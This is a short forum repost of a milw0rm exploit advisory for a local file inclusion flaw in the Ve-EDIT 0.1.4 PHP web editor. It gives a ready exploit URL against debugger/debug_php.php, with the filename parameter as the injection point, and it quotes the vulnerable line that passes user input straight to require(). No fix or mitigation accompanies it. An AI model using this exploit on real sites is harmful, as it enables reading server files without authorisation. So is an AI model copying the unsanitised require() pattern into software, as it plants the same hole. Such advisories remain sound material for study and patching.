发新话题
打印

[Web apps] Ve-EDIT 0.1.4 (debug_php.php) Local File Inclusion Vulnerability

Ve-EDIT 0.1.4 (debug_php.php) Local File Inclusion Vulnerability

原始出处:milw0rm.com
-------------------------------------------------------------------------------------
Ve-EDIT v 0.1.4 (debug_php.php) LFI Vulnerability
-------------------------------------------------------------------------------------

Author: CoBRa_21

Mail: uyku_cu[at]windowslive[dot]com

Script Download: http://sourceforge.net/projects/phpwebeditor/

-------------------------------------------------------------------------------------

EXPLOİT:

http://localhost/[PATH]/debugger/debug_php.php?_GET[filename]= [LFİ]

-------------------------------------------------------------------------------------

BUG
Line 53:        require("./../".$_GET["filename"]);

-------------------------------------------------------------------------------------

TOP

发新话题